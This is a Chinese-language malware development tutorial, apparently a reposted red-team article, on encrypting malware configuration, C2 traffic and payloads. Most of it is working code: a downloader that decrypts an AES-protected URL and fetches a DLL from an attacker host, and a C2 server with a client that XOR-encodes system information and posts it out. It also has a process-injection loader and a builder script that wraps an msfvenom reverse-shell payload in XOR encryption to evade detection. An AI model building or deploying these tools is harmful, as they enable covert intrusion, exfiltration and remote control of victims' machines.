03-恶意软件常用算法
前面主要是加密字符串信息,加密算法还可以加密shellcode、通信数据包、配置信息等
01-常用加密算法概述
加密配置信息、加密通信信道、加密窃取数据、混淆代码放置静态分析
总体来说就是加密shellcode、代码模块、配置信息、通信等
02-加密配置信息
设置一个场景,恶意dll文件,放在http://192.168.136.131:4455/dll.dll,exe通过配置文件下载
dll代码
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) {
switch (nReason) {
case DLL_PROCESS_ATTACH:
MessageBox(
NULL,
"Meow from evil.dll!",
"=^..^=",
MB_OK
);
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}
编译
x86_64-w64-mingw32-g++ -shared -o dll.dll dll.c -fpermissive配置文件信息
http://192.168.136.131:4445/evil.dll使用AES-128加密配置文件
#include <windows.h>
#include <wininet.h>
#include <wincrypt.h>
#include <stdio.h>
#define AES_BLOCK_SIZE 16
#define IN_CHUNK_SIZE (AES_BLOCK_SIZE * 10)
#define OUT_CHUNK_SIZE (IN_CHUNK_SIZE * 2)
void encryptFile(const char* inputFile, const char* outputFile, const char* aesKey) {
HCRYPTPROV hCryptProv = 0;
HCRYPTKEY hKey = 0;
HANDLE hInputFile = INVALID_HANDLE_VALUE;
HANDLE hOutputFile = INVALID_HANDLE_VALUE;
// Open input file for reading
hInputFile = CreateFileA(inputFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hInputFile == INVALID_HANDLE_VALUE) {
return;
}
// Check file size
LARGE_INTEGER fileSize;
if (!GetFileSizeEx(hInputFile, &fileSize)) {
CloseHandle(hInputFile);
return;
}
// Encrypt only if file size is less than 128MB
if (fileSize.QuadPart > 128 * 1024 * 1024) {
CloseHandle(hInputFile);
return;
}
// Create output file for writing
hOutputFile = CreateFileA(outputFile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hOutputFile == INVALID_HANDLE_VALUE) {
CloseHandle(hInputFile);
return;
}
// Cryptographic service provider
if (!CryptAcquireContextA(&hCryptProv, NULL, "Microsoft Enhanced RSA and AES Cryptographic Provider", PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
CryptDestroyKey(hKey);
CryptReleaseContext(hCryptProv, 0);
}
HCRYPTHASH hHash;
if (!CryptCreateHash(hCryptProv, CALG_SHA_256, 0, 0, &hHash)) {
CryptDestroyKey(hKey);
CryptReleaseContext(hCryptProv, 0);
}
if (!CryptHashData(hHash, (BYTE*)aesKey, strlen(aesKey), 0)) {
CryptDestroyKey(hKey);
CryptReleaseContext(hCryptProv, 0);
}
if (!CryptDeriveKey(hCryptProv, CALG_AES_128, hHash, 0, &hKey)) {
CryptDestroyKey(hKey);
CryptReleaseContext(hCryptProv, 0);
}
constsize_t chunk_size = OUT_CHUNK_SIZE;
BYTE* chunk = (BYTE*)malloc(chunk_size);
DWORD out_len = 0;
BOOL isFinal = FALSE;
DWORD readTotalSize = 0;
BOOL bResult = FALSE;
while (bResult = ReadFile(hInputFile, chunk, IN_CHUNK_SIZE, &out_len, NULL)) {
if (0 == out_len) {
break;
}
readTotalSize += out_len;
if (readTotalSize >= fileSize.QuadPart) {
isFinal = TRUE;
}
if (!CryptEncrypt(hKey, (HCRYPTHASH)NULL, isFinal, 0, chunk, &out_len, chunk_size)) {
break;
}
DWORD written = 0;
if (!WriteFile(hOutputFile, chunk, out_len, &written, NULL)) {
break;
}
memset(chunk, 0, chunk_size);
}
if (hKey != 0) {
CryptDestroyKey(hKey);
}
if (hCryptProv != 0) {
CryptReleaseContext(hCryptProv, 0);
}
if (hInputFile != INVALID_HANDLE_VALUE) {
CloseHandle(hInputFile);
}
if (hOutputFile != INVALID_HANDLE_VALUE) {
CloseHandle(hOutputFile);
}
free(chunk);
}
int main() {
constchar *inputFile = "config.txt";
constchar *encryptedFile = "config.txt.aes";
constchar *encryptionKey = "ThisIsASecretKey";
// encrypt configuration file
encryptFile(inputFile, encryptedFile, encryptionKey);
return0;
}
编译
x86_64-w64-mingw32-g++ encrypt.c -o encrypt.exe -mconsole -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -Wint-to-pointer-cast -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive -lcrypt32运行后看加密效果
使用的时候先解密再下载
#include <windows.h>
#include <wininet.h>
#include <wincrypt.h>
#include <stdio.h>
#define AES_BLOCK_SIZE 16
#define IN_CHUNK_SIZE (AES_BLOCK_SIZE * 10)
#define OUT_CHUNK_SIZE (IN_CHUNK_SIZE * 2)
void downloadFile(const char *url, const char *outputFile) {
HINTERNET hSession, hUrl;
DWORD bytesRead, bytesWritten;
BYTE buffer[4096];
// Initialize WinINet
hSession = InternetOpen((LPCSTR)"Mozilla/5.0", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
if (!hSession) {
printf("InternetOpen failedn");
}
// Open URL
hUrl = InternetOpenUrlA(hSession, (LPCSTR)url, NULL, 0, INTERNET_FLAG_RELOAD, 0);
if (!hUrl) {
InternetCloseHandle(hSession);
printf("InternetOpenUrlA failedn");
}
// Open output file for writing
HANDLE hOutputFile = CreateFileA(outputFile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hOutputFile == INVALID_HANDLE_VALUE) {
InternetCloseHandle(hUrl);
InternetCloseHandle(hSession);
printf("failed to create output filen");
}
// Read data from URL and write to the output file
while (InternetReadFile(hUrl, buffer, sizeof(buffer), &bytesRead) && bytesRead > 0) {
WriteFile(hOutputFile, buffer, bytesRead, &bytesWritten, NULL);
}
// Cleanup
CloseHandle(hOutputFile);
InternetCloseHandle(hUrl);
InternetCloseHandle(hSession);
}
void decryptFile(const char* inputFile, const char* outputFile, const BYTE* aesKey) {
HCRYPTPROV hCryptProv;
HCRYPTKEY hKey;
HANDLE hInputFile = INVALID_HANDLE_VALUE;
HANDLE hOutputFile = INVALID_HANDLE_VALUE;
DWORD len = strlen((constchar*)aesKey);
DWORD key_size = len * sizeof(aesKey[0]);
// Open input file for reading
hInputFile = CreateFileA(inputFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hInputFile == INVALID_HANDLE_VALUE) {
return;
}
// Create output file for writing
hOutputFile = CreateFileA(outputFile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hOutputFile == INVALID_HANDLE_VALUE) {
return;
}
// Cryptographic service provider
if (!CryptAcquireContextA(&hCryptProv, NULL, "Microsoft Enhanced RSA and AES Cryptographic Provider", PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
CryptDestroyKey(hKey);
CryptReleaseContext(hCryptProv, 0);
}
HCRYPTHASH hHash;
if (!CryptCreateHash(hCryptProv, CALG_SHA_256, 0, 0, &hHash)) {
CryptDestroyKey(hKey);
CryptReleaseContext(hCryptProv, 0);
}
BYTE utf8ByteArray[32];
strcpy((char*)utf8ByteArray, (constchar*)aesKey);
if (!CryptHashData(hHash, utf8ByteArray, key_size, 0)) {
CryptDestroyKey(hKey);
CryptReleaseContext(hCryptProv, 0);
return;
}
// HCRYPTKEY hKey;
if (!CryptDeriveKey(hCryptProv, CALG_AES_128, hHash, 0, &hKey)) {
CryptDestroyKey(hKey);
CryptReleaseContext(hCryptProv, 0);
return;
}
constsize_t chunk_size = IN_CHUNK_SIZE;
BYTE* chunk = (BYTE*)malloc(chunk_size);
DWORD out_len = 0;
BOOL isFinal = FALSE;
DWORD readTotalSize = 0;
BOOL bResult = FALSE;
DWORD inputSize = GetFileSize(hInputFile, NULL);
while (bResult = ReadFile(hInputFile, (LPVOID)chunk, IN_CHUNK_SIZE, &out_len, NULL)) {
if (0 == out_len) {
break;
}
readTotalSize += out_len;
if (readTotalSize >= inputSize) {
isFinal = TRUE;
}
if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, isFinal, 0, chunk, &out_len)) {
CryptDestroyKey(hKey);
CryptReleaseContext(hCryptProv, 0);
break;
}
DWORD written = 0;
if (!WriteFile(hOutputFile, chunk, out_len, &written, NULL)) {
CloseHandle(hOutputFile);
break;
}
memset(chunk, 0, chunk_size);
}
if (hKey != 0) {
CryptDestroyKey(hKey);
}
if (hCryptProv != 0) {
CryptReleaseContext(hCryptProv, 0);
}
if (hInputFile != INVALID_HANDLE_VALUE) {
CloseHandle(hInputFile);
}
if (hOutputFile != INVALID_HANDLE_VALUE) {
CloseHandle(hOutputFile);
}
free(chunk);
}
int main() {
constchar *encryptedFile = "config.txt.aes";
constchar *decryptedFile = "decrypted.txt";
constchar *encryptionKey = "ThisIsASecretKey";
// Decrypt configuration file
decryptFile(encryptedFile, decryptedFile, (const BYTE*)encryptionKey);
// Read the URL from the decrypted file
FILE *decryptedFilePtr = fopen(decryptedFile, "r");
if (!decryptedFilePtr) {
printf("failed to open decrypted filen");
}
char url[256];
fgets(url, sizeof(url), decryptedFilePtr);
fclose(decryptedFilePtr);
// Remove newline character if present
size_t urlLength = strlen(url);
if (url[urlLength - 1] == 'n') {
url[urlLength - 1] = '�';
}
// Download the file using the URL
constchar *downloadedFile = "evil.dll";
printf("decrypted URL: %sn", url);
downloadFile(url, downloadedFile);
printf("file downloaded from the URL.n");
return0;
}
编译
x86_64-w64-mingw32-g++ hack.c -o hack.exe -mconsole -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -Wint-to-pointer-cast -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive -lwininet -lcrypt32运行后,下载成功
实际攻击中会更复杂,秘钥也是从url下载,url信息使用base64+sha256加密等等
03-通信加密
场景在kali上使用server.py启动https服务,windows上的post加密信息,server.py解密后显示
通信使用https证书加密,数据使用XOR编码
# python simple C2 server for malware sample
import http.server
import socketserver
import ssl
from urllib.parse import urlparse, parse_qs
PORT = 4443
CERTFILE = "server.crt"
KEYFILE = "server.key"
classMyHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
XOR_KEY = "k" # Define the same XOR key used in the client
def xor(self, data, key):
key = str(key)
l = len(key)
output_str = ""
for i in range(len(data)):
current = data[i]
current_key = key[i % len(key)]
ordd = lambda x: x ifisinstance(x, int) elseord(x)
output_str += chr(ordd(current) ^ ord(current_key))
return output_str
def do_POST(self):
content_length = int(self.headers['Content-Length'])
encrypted_data = self.rfile.read(content_length)
# Decrypt the received data using single-byte XOR
decrypted_data = self.xor_decrypt(encrypted_data)
# Handle the decrypted data here
print("decrypted data:")
print(decrypted_data)
# Send an HTTP OK response
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write("HTTP OK".encode('utf-8'))
def xor_decrypt(self, data):
ciphertext = self.xor(data, self.XOR_KEY)
return ciphertext
def run_https_server():
httpd = socketserver.TCPServer(("0.0.0.0", PORT), MyHTTPRequestHandler)
# Load SSL certificate and key
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=CERTFILE, keyfile=KEYFILE, server_side=True)
print(f"server running on port {PORT}")
httpd.serve_forever()
if __name__ == "__main__":
run_https_server()
开启https服务
python3 server.py
/home/kali/Desktop/MalDev/chapter11/02-malware-communication/server.py:52: DeprecationWarning: ssl.wrap_socket() is deprecated, use SSLContext.wrap_socket()
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=CERTFILE, keyfile=KEYFILE, server_side=True)
server running on port 4443客户端代码
#include <windows.h>
#include <winhttp.h>
#include <stdio.h>
#include <stdbool.h>
char xor_key[] = "k";
bool encryptData(char* data, size_t dataSize) {
for (size_t i = 0; i < dataSize; ++i) {
data[i] ^= xor_key[0]; // Perform XOR encryption
}
returntrue;
}
bool hack() {
HINTERNET hSession = NULL, hConnect = NULL, hRequest = NULL;
DWORD bytesRead;
char systemInfo[4096];
// Get system information
snprintf(systemInfo, sizeof(systemInfo),
"OS Version: %d.%d.%dnScreen Width: %dnScreen Height: %dn",
GetVersion() & 0xFF, (GetVersion() >> 8) & 0xFF, (GetVersion() >> 16) & 0xFF,
GetSystemMetrics(SM_CXSCREEN), GetSystemMetrics(SM_CYSCREEN));
// Encrypt system information
encryptData(systemInfo, strlen(systemInfo));
hSession = WinHttpOpen(L"SystemInfoClient/1.0", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
if (hSession == NULL) {
fprintf(stderr, "WinHttpOpen. error: %d has occurred.n", GetLastError());
returnfalse;
}
hConnect = WinHttpConnect(hSession, L"192.168.136.131", 4443, 0);
if (hConnect == NULL) {
fprintf(stderr, "WinHttpConnect. error: %d has occurred.n", GetLastError());
WinHttpCloseHandle(hSession);
returnfalse;
}
hRequest = WinHttpOpenRequest(hConnect, L"POST", L"/", NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, WINHTTP_FLAG_SECURE);
if (hRequest == NULL) {
fprintf(stderr, "WinHttpOpenRequest. error: %d has occurred.n", GetLastError());
WinHttpCloseHandle(hConnect);
WinHttpCloseHandle(hSession);
returnfalse;
}
DWORD dwFlags = SECURITY_FLAG_IGNORE_UNKNOWN_CA |
SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
WinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &dwFlags, sizeof(dwFlags));
if (!WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0, systemInfo, strlen(systemInfo), strlen(systemInfo), 0)) {
fprintf(stderr, "WinHttpSendRequest. error %d has occurred.n", GetLastError());
WinHttpCloseHandle(hRequest);
WinHttpCloseHandle(hConnect);
WinHttpCloseHandle(hSession);
returnfalse;
}
if (!WinHttpReceiveResponse(hRequest, NULL)) {
fprintf(stderr, "WinHttpReceiveResponse. Error %d has occurred.n", GetLastError());
returnfalse;
}
WinHttpCloseHandle(hRequest);
WinHttpCloseHandle(hConnect);
WinHttpCloseHandle(hSession);
printf("system information sent successfully.n");
returntrue;
}
int main() {
hack();
return0;
}
编译
x86_64-w64-mingw32-g++ hack.c -o hack.exe -mconsole -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -Wint-to-pointer-cast -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive -lwinhttpwindows上运行
.hack.exe
system information sent successfully.kali上看到解密信息
04-载荷混淆加密
shellcode注入模板,XOR解密后通过PID注入shellcode
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
// Payload
unsignedchar encryptedPayload[] = { };
char decryptionKey[] = "";
// Decryption
void decryptPayload(char * data, size_t dataLength, char * decryptionKey, size_t keyLength) {
int keyIndex = 0;
for (int dataIndex = 0; dataIndex < dataLength; dataIndex++) {
if (keyIndex == keyLength - 1) keyIndex = 0;
data[dataIndex] = data[dataIndex] ^ decryptionKey[keyIndex];
keyIndex++;
}
}
int main(int argc, char* argv[]) {
HANDLE processHandle; // Process handle
HANDLE remoteThread; // Remote thread
PVOID remoteBuffer; // Remote buffer
// Parse process ID
printf("PID: %i", atoi(argv[1]));
processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
// Decrypt payload
decryptPayload((char *)encryptedPayload, sizeof(encryptedPayload), decryptionKey, sizeof(decryptionKey));
// Allocate memory buffer for remote process
remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof(encryptedPayload), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
// "Copy" data between processes
WriteProcessMemory(processHandle, remoteBuffer, encryptedPayload, sizeof(encryptedPayload), NULL);
// Our process starts a new thread
remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
CloseHandle(processHandle);
return0;
}
上面是模板,使用py代码生成shellcode去填写这个模板
# payload encryption functions
import argparse
import subprocess
import sys
import random
import os
import hashlib
import string
classColors:
HEADER = '�33[95m'
BLUE = '�33[94m'
GREEN = '�33[92m'
YELLOW = '�33[93m'
RED = '�33[91m'
PURPLE = '�33[95m'
ENDC = '�33[0m'
BOLD = '�33[1m'
UNDERLINE = '�33[4m'
def random_key():
length = random.randint(16, 32)
return''.join(random.choice(string.ascii_letters) for i in range(length))
def xor(data, key):
key = str(key)
l = len(key)
output_str = ""
for i in range(len(data)):
current = data[i]
current_key = key[i % len(key)]
ordd = lambda x: x if isinstance(x, int) else ord(x)
output_str += chr(ordd(current) ^ ord(current_key))
return output_str
def xor_encrypt(data, key):
ciphertext = xor(data, key)
ciphertext = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };'
return ciphertext, key
def generate_payload(host, port):
print (Colors.BLUE + "generate reverse shell payload..." + Colors.ENDC)
msfv = "msfvenom -p windows/x64/shell_reverse_tcp"
msfv += " LHOST=" + host
msfv += " LPORT=" + port
msfv += " -f raw"
msfv += " -o /tmp/hack.bin"
print (Colors.YELLOW + msfv + Colors.ENDC)
try:
p = subprocess.Popen(msfv.split(), stdout = subprocess.PIPE)
p.wait()
print (Colors.GREEN + "reverse shell payload successfully generated :)" + Colors.ENDC)
except Exception as e:
print (Colors.RED + "generate payload failed :(" + Colors.ENDC)
sys.exit()
def run(host, port):
print (Colors.BLUE + "run..." + Colors.ENDC)
generate_payload(host, port)
print (Colors.BLUE + "read payload..." + Colors.ENDC)
plaintext = open("/tmp/hack.bin", "rb").read()
print (Colors.BLUE + "build..." + Colors.ENDC)
print (Colors.BLUE + "encrypt..." + Colors.ENDC)
ciphertext, payload_key = xor_encrypt(plaintext, random_key())
tmp = open("temp.c", "rt")
data = tmp.read()
data = data.replace('unsigned char encryptedPayload[] = { };', 'unsigned char encryptedPayload[] = ' + ciphertext)
data = data.replace('char decryptionKey[] = "";', 'char decryptionKey[] = "' + payload_key + '";')
tmp.close()
tmp = open("temp-enc.c", "w+")
tmp.write(data)
tmp.close()
print (Colors.GREEN + "successfully encrypt template file :)" + Colors.ENDC)
print (Colors.BLUE + "compiling..." + Colors.ENDC)
try:
cmd = "x86_64-w64-mingw32-g++ -O2 temp-enc.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive >/dev/null 2>&1"
os.system(cmd)
except:
print (Colors.RED + "error compiling template :(" + Colors.ENDC)
sys.exit()
else:
print (Colors.YELLOW + cmd + Colors.ENDC)
print (Colors.GREEN + "successfully compiled :)" + Colors.ENDC)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-l','--lhost', required = True, help = "local IP")
parser.add_argument('-p','--lport', required = True, help = "local port", default = '4444')
args = vars(parser.parse_args())
host, port = args['lhost'], args['lport']
run(host, port)
使用msfvenom生成shellcode,填写模板,编译生成exe
python3 encrypt.py -l 192.168.136.131 -p 4445
windows上运行生成的exe,代码注入指定进程
kali上获得shell
原文始发于微信公众号(高级红队专家):【MalDev-14】恶意软件常用算法
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论